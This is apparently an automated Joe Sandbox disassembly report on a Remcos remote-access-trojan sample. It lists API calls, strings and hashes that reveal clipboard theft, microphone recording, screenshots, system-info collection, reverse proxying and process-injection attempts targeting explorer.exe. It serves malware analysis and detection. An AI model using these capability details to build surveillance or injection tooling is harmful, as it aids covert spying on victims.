                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID: !D@$xdF
                                                  • API String ID: 2172192267-3540039394
                                                  • Opcode ID: 8fa10aa376ebaf25ee3630a4794345ebfab9a0a2ea110666d712cf94ba17d34f
                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                  • Opcode Fuzzy Hash: 8fa10aa376ebaf25ee3630a4794345ebfab9a0a2ea110666d712cf94ba17d34f
                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: `m$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 489098229-3983582313
                                                  • Opcode ID: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                  • Opcode Fuzzy Hash: ef3a2b2680ef5ec4cf1756d8d4e3928048fec3981f722f661be4b2a60a96407b
                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 4f8818f08d00926a306fd43cd4184e82022229610b1e796f619c5a27228b4704
                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                  • Opcode Fuzzy Hash: 4f8818f08d00926a306fd43cd4184e82022229610b1e796f619c5a27228b4704
                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: (aF$,aF$xUG$xdF$NG$NG$TG
                                                  • API String ID: 3114080316-4028018678
                                                  • Opcode ID: 3fb4b6dc986a23466442fc4131dd13dcbc317708c85a7ea8f8e2c569672bf7b6
                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                  • Opcode Fuzzy Hash: 3fb4b6dc986a23466442fc4131dd13dcbc317708c85a7ea8f8e2c569672bf7b6
                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: 0VG$0VG$<$@$Temp
                                                  • API String ID: 1704390241-2575729100
                                                  • Opcode ID: 2d576fcb946d6f01edb727822a5e6d620b667b1b28aa3a8afe43313f29a435af
                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                  • Opcode Fuzzy Hash: 2d576fcb946d6f01edb727822a5e6d620b667b1b28aa3a8afe43313f29a435af
                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG$@!G
                                                  • API String ID: 3815856325-312998898
                                                  • Opcode ID: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                  • Opcode Fuzzy Hash: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  • Opcode ID: a9e8ab578ca4cd2aaf0876d744ec30be9796520795cbbbc92ad7de9a4a51c203
                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                  • Opcode Fuzzy Hash: a9e8ab578ca4cd2aaf0876d744ec30be9796520795cbbbc92ad7de9a4a51c203
                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 8090b2f4041f96567b3b7adde4f4e3da2ccf834a7cb6d2ec55bf58c444d150ed
                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                  • Opcode Fuzzy Hash: 8090b2f4041f96567b3b7adde4f4e3da2ccf834a7cb6d2ec55bf58c444d150ed
                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\FPPhfkcDCh.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                  • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  • Opcode ID: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                  • Opcode Fuzzy Hash: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: `m$dMG$|MG
                                                  • API String ID: 1356121797-2782214637
                                                  • Opcode ID: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
